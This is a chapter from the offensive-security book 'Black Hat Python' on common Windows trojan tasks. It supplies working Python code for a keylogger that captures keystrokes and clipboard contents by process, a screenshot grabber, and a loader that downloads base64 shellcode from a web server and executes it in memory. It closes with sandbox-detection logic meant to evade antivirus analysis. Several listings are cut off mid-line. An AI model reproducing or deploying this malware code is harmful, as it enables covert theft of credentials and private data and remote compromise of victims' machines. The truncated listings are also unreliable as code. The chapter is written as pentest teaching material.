Common Trojaning Tasks on Windows - Black Hat Python: Python Programming for Hackers and Pentesters (2014)

Chapter 8. Common Trojaning Tasks on Windows

When you deploy a trojan, you want to perform a few common tasks: grab keystrokes, take screenshots, and execute shellcode to provide an interactive session to tools like CANVAS or Metasploit. This chapter focuses on these tasks. We’ll wrap things up with some sandbox detection techniques to determine if we are running within an antivirus or forensics sandbox. These modules will be easy to modify and will work within our trojan framework. In later chapters, we’ll explore man-in-the-browser-style attacks and privilege escalation techniques that you can deploy with your trojan. Each technique comes with its own challenges and probability of being caught by the end user or an antivirus solution. I recommend that you carefully model your target after you’ve implanted your trojan so that you can test the modules in your lab before trying them on a live target. Let’s get started by creating a simple keylogger.

Keylogging for Fun and Keystrokes

Keylogging is one of the oldest tricks in the book and is still employed with various levels of stealth today. Attackers still use it because it’s extremely effective at capturing sensitive information such as credentials or conversations.

An excellent Python library named PyHook[17] enables us to easily trap all keyboard events. It takes advantage of the native Windows function SetWindowsHookEx, which allows you to install a user-defined function to be called for certain Windows events. By registering a hook for keyboard events, we are able to trap all of the keypresses that a target issues. On top of this, we want to know exactly what process they are executing these keystrokes against, so that we can determine when usernames, passwords, or other tidbits of useful information are entered. PyHook takes care of all of the low-level programming for us, which leaves the core logic of the keystroke logger up to us. Let’s crack open a new script and drop in some of the plumbing:

from ctypes import *

import pythoncom

import pyHook

import win32clipboard

user32 = windll.user32

kernel32 = windll.kernel32

psapi = windll.psapi

current_window = None

def get_current_process():

# get a handle to the foreground window

➊ hwnd = user32.GetForegroundWindow()

# find the process ID

pid = c_ulong(0)

➋ user32.GetWindowThreadProcessId(hwnd, byref(pid))

# store the current process ID

process_id = "%d" % pid.value

# grab the executable

executable = create_string_buffer("\x00" * 512)

➌ h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)

➍ psapi.GetModuleBaseNameA(h_process,None,byref(executable),512)

# now read its title

window_title = create_string_buffer("\x00" * 512)

➎ length = user32.GetWindowTextA(hwnd, byref(window_title),512)

# print out the header if we're in the right process


➏ print "[ PID: %s - %s - %s ]" % (process_id, executable.value, window_.



# close handles



All right! So we just put in some helper variables and a function that will capture the active window and its associated process ID. We first call GetForegroundWindow ➊, which returns a handle to the active window on the target’s desktop. Next we pass that handle to the GetWindowThreadProcessId ➋ function to retrieve the window’s process ID. We then open the process ➌ and, using the resulting process handle, we find the actual executable name ➍ of the process. The final step is to grab the full text of the window’s title bar using the GetWindowTextA ➎ function. At the end of our helper function we output all of the information ➏ in a nice header so that you can clearly see which keystrokes went with which process and window. Now let’s put the meat of our keystroke logger in place to finish it off.

def KeyStroke(event):

global current_window

# check to see if target changed windows

➊ if event.WindowName != current_window:

current_window = event.WindowName


# if they pressed a standard key

➋ if event.Ascii > 32 and event.Ascii < 127:

print chr(event.Ascii),


# if [Ctrl-V], get the value on the clipboard

➌ if event.Key == "V":


pasted_value = win32clipboard.GetClipboardData()


print "[PASTE] - %s" % (pasted_value),


print "[%s]" % event.Key,

# pass execution to next hook registered

return True

# create and register a hook manager

➍ kl = pyHook.HookManager()

➎ kl.KeyDown = KeyStroke

# register the hook and execute forever

➏ kl.HookKeyboard()


That’s all you need! We define our PyHook HookManager ➍ and then bind the KeyDown event to our user-defined callback function KeyStroke ➎. We then instruct PyHook to hook all keypresses ➏ and continue execution. Whenever the target presses a key on the keyboard, our KeyStroke function is called with an event object as its only parameter. The first thing we do is check if the user has changed windows ➊ and if so, we acquire the new window’s name and process information. We then look at the keystroke that was issued ➋ and if it falls within the ASCII-printable range, we simply print it out. If it’s a modifier (such as the SHIFT, CTRL, or ALT keys) or any other nonstandard key, we grab the key name from the event object. We also check if the user is performing a paste operation ➌, and if so we dump the contents of the clipboard. The callback function wraps up by returning True to allow the next hook in the chain, if there is one, to process the event. Let’s take it for a spin!
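The printable-range rule at ➋ is easy to check in isolation. The following is a minimal sketch, not part of the chapter's script: `describe_key` is a hypothetical helper, the key names passed to it are illustrative, and it is written so that it runs on any platform under Python 3.

```python
def describe_key(ascii_code, key_name):
    """Return the text that the rule at callout 2 would print for one key."""
    # Codes 33 through 126 are the visible ASCII characters. The strict
    # "> 32" comparison excludes the space character (code 32), so a space
    # is reported by its key name rather than as a character.
    if 32 < ascii_code < 127:
        return chr(ascii_code)
    return "[%s]" % key_name


# Illustrative inputs: (character code, key name) pairs chosen by hand.
print(describe_key(116, "T"))        # a lowercase letter
print(describe_key(32, "Space"))     # falls through to the key name
print(describe_key(0, "Lshift"))     # assumed code 0 for a modifier key
```

Because the comparison is strict on both ends, a typed space shows up as a bracketed key name in the log rather than as a gap between characters, which is worth remembering when reading the captured output.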

Kicking the Tires

It’s easy to test our keylogger. Simply run it, and then start using Windows normally. Try using your web browser, calculator, or any other application, and view the results in your terminal. The output below is going to look a little off, which is only due to the formatting in the book.


[ PID: 3836 - cmd.exe - C:\WINDOWS\system32\cmd.exe -

c:\Python27\python.exe key ]

t e s t

[ PID: 120 - IEXPLORE.EXE - Bing - Microsoft Internet Explorer ]

w w w . n o s t a r c h . c o m [Return]

[ PID: 3836 - cmd.exe - C:\WINDOWS\system32\cmd.exe -

c:\Python27\python.exe ]

[Lwin] r

[ PID: 1944 - Explorer.EXE - Run ]

c a l c [Return]

[ PID: 2848 - calc.exe - Calculator ]

➊ [Lshift] + 1 =

You can see that I typed the word test into the main window where the keylogger script ran. I then fired up Internet Explorer, browsed to www.nostarch.com, and ran some other applications. We can now safely say that our keylogger can be added to our bag of trojaning tricks! Let’s move on to taking screenshots.

Taking Screenshots

Most pieces of malware and penetration testing frameworks include the capability to take screenshots against the remote target. This can help capture images, video frames, or other sensitive data that you might not see with a packet capture or keylogger. Thankfully, we can use the PyWin32 package (see Installing the Prerequisites) to make native calls to the Windows API to grab them.

A screenshot grabber will use the Windows Graphics Device Interface (GDI) to determine necessary properties such as the total screen size, and to grab the image. Some screenshot software will only grab a picture of the currently active window or application, but in our case we want the entire screen. Let’s get started. Crack open a new script and drop in the following code:

import win32gui

import win32ui

import win32con

import win32api

# grab a handle to the main desktop window

➊ hdesktop = win32gui.GetDesktopWindow()

# determine the size of all monitors in pixels

➋ width = win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)

height = win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)

left = win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)

top = win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)

# create a device context

➌ desktop_dc = win32gui.GetWindowDC(hdesktop)

img_dc = win32ui.CreateDCFromHandle(desktop_dc)

# create a memory based device context

➍ mem_dc = img_dc.CreateCompatibleDC()

# create a bitmap object

➎ screenshot = win32ui.CreateBitmap()

screenshot.CreateCompatibleBitmap(img_dc, width, height)

mem_dc.SelectObject(screenshot)

# copy the screen into our memory device context

➏ mem_dc.BitBlt((0, 0), (width, height), img_dc, (left, top), win32con.SRCCOPY)

➐ # save the bitmap to a file

screenshot.SaveBitmapFile(mem_dc, 'c:\\WINDOWS\\Temp\\screenshot.bmp')

# free our objects

mem_dc.DeleteDC()

win32gui.DeleteObject(screenshot.GetHandle())


Let’s review what this little script does. First we acquire a handle to the entire desktop ➊, which includes the entire viewable area across multiple monitors. We then determine the size of the screen(s) ➋ so that we know the dimensions required for the screenshot. We create a device context[18] using the GetWindowDC ➌ function call and pass in a handle to our desktop. Next we need to create a memory-based device context ➍ where we will store our image capture until we store the bitmap bytes to a file. We then create a bitmap object ➎ that is set to the device context of our desktop. The SelectObject call then sets the memory-based device context to point at the bitmap object that we’re capturing. We use the BitBlt ➏ function to take a bit-for-bit copy of the desktop image and store it in the memory-based context. Think of this as a memcpy call for GDI objects. The final step is to dump this image to disk ➐. This script is easy to test: Just run it from the command line and check the C:\WINDOWS\Temp directory for your screenshot.bmp file. Let’s move on to executing shellcode.
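One detail of the script is worth a closer look: the BitBlt source origin is (left, top) rather than (0, 0). On a multi-monitor desktop the virtual screen is the bounding box of every monitor, and its origin can be negative when a monitor sits to the left of or above the primary display. The sketch below reproduces that arithmetic in plain Python so it can be run anywhere. The `virtual_screen` helper and the monitor layout are hypothetical and stand in for the four GetSystemMetrics values.

```python
def virtual_screen(monitors):
    """Bounding box of monitors given as (left, top, width, height) tuples."""
    left = min(m[0] for m in monitors)
    top = min(m[1] for m in monitors)
    right = max(m[0] + m[2] for m in monitors)
    bottom = max(m[1] + m[3] for m in monitors)
    return left, top, right - left, bottom - top


# Hypothetical layout: a 1920x1080 primary display at the origin and a
# 1280x1024 secondary display placed to its left (negative x origin).
layout = [(0, 0, 1920, 1080), (-1280, 0, 1280, 1024)]
left, top, width, height = virtual_screen(layout)
print(left, top, width, height)   # -1280 0 3200 1080
```

Copying from (0, 0) with this layout would miss the secondary display entirely, which is why the script reads all four metrics instead of only the width and height.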

Pythonic Shellcode Execution

There might come a time when you want to be able to interact with one of your target machines, or use a juicy new exploit module from your favorite penetration testing or exploit framework. This typically, though not always, requires some form of shellcode execution. In order to execute raw shellcode, we simply need to create a buffer in memory, and using the ctypes module, create a function pointer to that memory and call the function. In our case, we’re going to use urllib2 to grab the shellcode from a web server in base64 format and then execute it. Let’s get started! Open up a new script and enter the following code:

import urllib2

import ctypes

import base64

# retrieve the shellcode from our web server

url = "http://localhost:8000/shellcode.bin"

➊ response = urllib2.urlopen(url)

# decode the shellcode from base64

shellcode = base64.b64decode(

# create a buffer in memory

➋ shellcode_buffer = ctypes.create_string_buffer(shellcode, len(shellcode))

# create a function pointer to our shellcode

➌ shellcode_func = ctypes.cast(shellcode_buffer, ctypes.CFUNCTYPE


# call our shellcode

➍ shellcode_func()

How awesome is that? We kick it off by retrieving our base64-encoded shellcode from our web server ➊. We then allocate a buffer ➋ to hold the shellcode after we’ve decoded it. The ctypes cast function allows us to cast the buffer to act like a function pointer ➌ so that we can call our shellcode like we would call any normal Python function. We finish it up by calling our function pointer, which then causes the shellcode to execute ➍.

Kicking the Tires

You can handcode some shellcode or use your favorite pentesting framework like CANVAS or Metasploit[19] to generate it for you. I picked some Windows x86 callback shellcode for CANVAS in my case. Store the raw shellcode (not the string buffer!) in /tmp/shellcode.raw on your Linux machine and run the following:

justin$ base64 -i shellcode.raw > shellcode.bin

justin$ python -m SimpleHTTPServer

Serving HTTP on port 8000 ...

We simply base64-encoded the shellcode using the standard Linux command line. The next little trick uses the SimpleHTTPServer module to treat your current working directory (in our case, /tmp/) as its web root. Any requests for files will be served automatically for you. Now drop your script into your Windows VM and execute it. You should see the following in your Linux terminal:

- - [12/Jan/2014 21:36:30] "GET /shellcode.bin HTTP/1.1" 200 -

This indicates that your script has retrieved the shellcode from the simple web server that you set up using the SimpleHTTPServer module. If all goes well, you’ll receive a shell back to your framework, pop calc.exe, display a message box, or do whatever your shellcode was compiled for.
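The encoding step can be sanity-checked on its own before anything is served. The sketch below uses a few harmless placeholder bytes rather than real shellcode and assumes Python 3. It confirms that the encode and decode steps round-trip, and that the line breaks the command-line base64 tool adds to its output do not disturb decoding.

```python
import base64

# Harmless placeholder bytes standing in for the contents of a raw file.
raw = bytes([0x00, 0x41, 0xFF, 0x10, 0x0A])

encoded = base64.b64encode(raw)       # what the served text file would hold
decoded = base64.b64decode(encoded)   # what the client recovers

print(encoded)           # b'AEH/EAo='
print(decoded == raw)    # True

# Command-line encoders wrap long output and end it with a newline.
# b64decode ignores characters outside the base64 alphabet by default,
# so those line breaks are harmless.
wrapped = b"AEH/\nEAo=\n"
print(base64.b64decode(wrapped) == raw)   # True
```

Comparing the decoded bytes against the original file is a quick way to rule out a transfer or encoding problem when a payload misbehaves in the lab.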

Sandbox Detection

Increasingly, antivirus solutions employ some form of sandboxing to determine the behavior of suspicious specimens. Whether this sandbox runs on the network perimeter, which is becoming more popular, or on the target machine itself, we must do our best to avoid tipping our hand to any defense in place on the target’s network. We can use a few indicators to try to determine whether our trojan is executing within a sandbox. We’ll monitor our target machine for recent user input, including keystrokes and mouse-clicks.

Then we’ll add some basic intelligence to look for keystrokes, mouse-clicks, and double-clicks. Our script will also try to determine if the sandbox operator is sending input repeatedly (i.e., a suspicious rapid succession of continuous mouse-clicks) in order to try to respond to rudimentary sandbox detection methods. We’ll compare the last time a user interacted with the machine versus how long the machine has been running, which should give us a good idea whether we are inside a sandbox or not. A typical machine has many interactions at some point during a day since it has been booted, whereas a sandbox environment usually has no user interaction because sandboxes are typically used as an automated malware analysis technique.

We can then make a determination as to whether we would like to continue executing or not. Let’s start working on some sandbox detection code. Open a new script and throw in the following code:

import ctypes

import random

import time

import sys

user32 = ctypes.windll.user32

kernel32 = ctypes.windll.kernel32

keystrokes = 0

mouse_clicks = 0

double_clicks = 0

These are the main variables where we are going to track the total number of mouse-clicks, double-clicks, and keystrokes. Later, we’ll look at the timing of the mouse events as well. Now let’s create and test some code for detecting how long the system has been running and how long since the last user input. Add the following function to your script:

class LASTINPUTINFO(ctypes.Structure):

_fields_ = [("cbSize", ctypes.c_uint),

("dwTime", ctypes.c_ulong)]

def get_last_input():

struct_lastinputinfo = LASTINPUTINFO()

➊ struct_lastinputinfo.cbSize = ctypes.sizeof(LASTINPUTINFO)

# get last input registered

➋ user32.GetLastInputInfo(ctypes.byref(struct_lastinputinfo))

# now determine how long the machine has been running

➌ run_time = kernel32.GetTickCount()

elapsed = run_time - struct_lastinputinfo.dwTime

print "[*] It's been %d milliseconds since the last input event." % elapsed

return elapsed


➍ while True:

    get_last_input()

    time.sleep(1)


We define a LASTINPUTINFO structure that will hold the timestamp (in milliseconds) of when the last input event was detected on the system. Do note that you have to initialize the cbSize ➊ variable to the size of the structure before making the call. We then call the GetLastInputInfo ➋ function, which populates our struct_lastinputinfo.dwTime field with the timestamp. The next step is to determine how long the system has been running by using the GetTickCount ➌ function call. The last little snippet of code ➍ is simple test code where you can run the script and then move the mouse, or hit a key on the keyboard and see this new piece of code in action.

We’ll define thresholds for these user input values next. But first it’s worth noting that the total running system time and the last detected user input event can also be relevant to your particular method of implantation. For example, if you know that you’re only implanting using a phishing tactic, then it’s likely that a user had to click or perform some operation to get infected. This means that within the last minute or two, you would see user input. If for some reason you see that the machine has been running for 10 minutes and the last detected input was 10 minutes ago, then you are likely inside a sandbox that has not processed any user input. These judgment calls are all part of having a good trojan that works consistently.

This same technique can be useful for polling the system to see if a user is idle or not, as you may only want to start taking screenshots when they are actively using the machine, and likewise, you may only want to transmit data or perform other tasks when the user appears to be offline. You could also, for example, model a user over time to determine what days and hours they are typically online.
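The idle calculation itself is plain arithmetic on two millisecond counters, so it can be exercised without Windows. One wrinkle is that GetTickCount returns a 32-bit value that wraps back to zero after roughly 49.7 days of uptime, and a naive subtraction then goes negative. The sketch below is a hedged illustration of handling that: `idle_milliseconds` and `is_idle` are hypothetical helpers, and the 30,000 ms default simply mirrors the threshold used later in the chapter.

```python
TICK_MODULUS = 2 ** 32  # the tick counter is a 32-bit millisecond value


def idle_milliseconds(tick_now, last_input_tick):
    """Milliseconds since the last input, tolerating counter wraparound."""
    return (tick_now - last_input_tick) % TICK_MODULUS


def is_idle(tick_now, last_input_tick, threshold_ms=30000):
    """True when no input has been seen for at least threshold_ms."""
    return idle_milliseconds(tick_now, last_input_tick) >= threshold_ms


print(idle_milliseconds(600000, 598500))             # 1500
print(idle_milliseconds(500, TICK_MODULUS - 1000))   # 1500, across the wrap
print(is_idle(600000, 0))                            # True
```

The last call corresponds to the case described above: ten minutes of uptime with the last input recorded at boot.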

Let’s delete the last three lines of test code, and add some additional code to look at keystrokes and mouse-clicks. We’ll use a pure ctypes solution this time as opposed to the PyHook method. You can easily use PyHook for this purpose as well, but having a couple of different tricks in your toolbox always helps as each antivirus and sandboxing technology has its own ways of spotting these tricks. Let’s get coding:

def get_key_press():

global mouse_clicks

global keystrokes

➊ for i in range(0,0xff):

➋ if user32.GetAsyncKeyState(i) == -32767:

# 0x1 is the code for a left mouse-click

➌ if i == 0x1:

mouse_clicks += 1

return time.time()

➍ elif i > 32 and i < 127:

keystrokes += 1

return None
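The magic number -32767 at ➋ is less arbitrary than it looks. GetAsyncKeyState returns a 16-bit value in which the high bit means the key is currently down and the low bit means it was pressed since the previous call. Both bits set gives 0x8001, which reads as -32767 when treated as a signed 16-bit integer. The sketch below decodes that value on any platform. `decode_key_state` is a hypothetical helper, and Microsoft's documentation cautions that the low bit is not fully reliable, so treat this as an explanation of the constant rather than a guarantee.

```python
import ctypes


def decode_key_state(state):
    """Split a 16-bit key state into (is_down, pressed_since_last_call)."""
    bits = state & 0xFFFF
    return bool(bits & 0x8000), bool(bits & 0x0001)


print(ctypes.c_short(0x8001).value)   # -32767
print(decode_key_state(-32767))       # (True, True)
print(decode_key_state(-32768))       # (True, False): held, no new press
print(decode_key_state(0))            # (False, False)
```

Testing for exactly -32767 therefore counts each new press once instead of counting a held key on every poll. With that encoding in mind, back to get_key_press.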

This simple function tells us the number of mouse-clicks, the time of the mouse-clicks, as well as how many keystrokes the target has issued. This works by iterating over the range of valid input keys ➊; for each key, we check whether the key has been pressed using the GetAsyncKeyState ➋ function call. If the key is detected as being pressed, we check if it is 0x1 ➌, which is the virtual key code for a left mouse-button click. We increment the total number of mouse-clicks and return the current timestamp so that we can perform timing calculations later on. We also check if there are ASCII keypresses on the keyboard ➍ and if so, we simply increment the total number of keystrokes detected. Now let’s combine the results of these functions into our primary sandbox detection loop. Add the following code to your script:

def detect_sandbox():

global mouse_clicks

global keystrokes

➊ max_keystrokes = random.randint(10,25)

max_mouse_clicks = random.randint(5,25)

double_clicks = 0

max_double_clicks = 10

double_click_threshold = 0.250 # in seconds

first_double_click = None

average_mousetime = 0

max_input_threshold = 30000 # in milliseconds

previous_timestamp = None

detection_complete = False

➋ last_input = get_last_input()

# if we hit our threshold let's bail out

if last_input >= max_input_threshold:


while not detection_complete:

➌ keypress_time = get_key_press()

if keypress_time is not None and previous_timestamp is not None:

# calculate the time between double clicks

➍ elapsed = keypress_time - previous_timestamp

# the user double clicked

➎ if elapsed <= double_click_threshold:

double_clicks += 1

if first_double_click is None:

# grab the timestamp of the first double click

first_double_click = time.time()


➏ if double_clicks == max_double_clicks:

➐ if keypress_time - first_double_click <= .

(max_double_clicks * double_click_threshold):


# we are happy there's enough user input

➑ if keystrokes >= max_keystrokes and double_clicks >= max_.

double_clicks and mouse_clicks >= max_mouse_clicks:


previous_timestamp = keypress_time

elif keypress_time is not None:

previous_timestamp = keypress_time


print "We are ok!"

All right. Be mindful of the indentation in the code blocks above! We start by defining some variables ➊ to track the timing of mouse-clicks, and some thresholds with regard to how many keystrokes or mouse-clicks we’re happy with before considering ourselves running outside a sandbox. We randomize these thresholds with each run, but you can of course set thresholds of your own based on your own testing.

We then retrieve the elapsed time ➋ since some form of user input has been registered on the system, and if we feel that it’s been too long since we’ve seen input (based on how the infection took place as mentioned previously), we bail out and the trojan dies. Instead of dying here, you could also choose to do some innocuous activity such as reading random registry keys or checking files. After we pass this initial check, we move on to our primary keystroke and mouse-click detection loop.

We first check for keypresses or mouse-clicks ➌ and we know that if the function returns a value, it is the timestamp of when the mouse-click occurred. Next we calculate the time elapsed between mouse-clicks ➍ and then compare it to our threshold ➎ to determine whether it was a double-click. Along with double-click detection, we’re looking to see if the sandbox operator has been streaming click events ➏ into the sandbox to try to fake out sandbox detection techniques. For example, it would be rather odd to see 100 double-clicks in a row during typical computer usage. If the maximum number of double-clicks has been reached and they happened in rapid succession ➐, we bail out. Our final step is to see if we have made it through all of the checks and reached our maximum number of clicks, keystrokes, and double-clicks ➑; if so, we break out of our sandbox detection function.
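The double-click rule at ➍ and ➎ boils down to comparing the gap between consecutive click timestamps against a threshold. The sketch below isolates that comparison in a pure function so the timing logic can be tested with made-up data. `count_double_clicks` and both timestamp lists are hypothetical, and the 0.250-second default is the threshold from the listing above.

```python
def count_double_clicks(click_times, threshold=0.250):
    """Count consecutive click pairs at most `threshold` seconds apart."""
    count = 0
    for earlier, later in zip(click_times, click_times[1:]):
        if later - earlier <= threshold:
            count += 1
    return count


# Hypothetical click timestamps, in seconds.
human = [0.0, 0.5, 1.25, 1.5, 5.0, 9.0]
scripted = [i * 0.125 for i in range(11)]

print(count_double_clicks(human))      # 1
print(count_double_clicks(scripted))   # 10
```

In the scripted list, ten double-clicks arrive within 1.25 seconds, well inside the max_double_clicks * double_click_threshold window of 2.5 seconds that the check at ➐ treats as suspicious. The hand-made list produces a single double-click over nine seconds.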

I encourage you to tweak and play with the settings, and to add additional features such as virtual machine detection. It might be worthwhile to track typical usage in terms of mouse-clicks, double-clicks, and keystrokes across a few computers that you own (I mean possess, not ones that you hacked into!) to see where you feel the happy spot is. Depending on your target, you may want more paranoid settings or you may not be concerned with sandbox detection at all. The tools that you developed in this chapter can act as a base layer of features to roll out in your trojan, and due to the modularity of our trojaning framework, you can choose to deploy any one of them.

[17] Download PyHook here:

[18] To learn all about device contexts and GDI programming, visit the MSDN page here:

[19] As CANVAS is a commercial tool, take a look at this tutorial for generating Metasploit payloads here: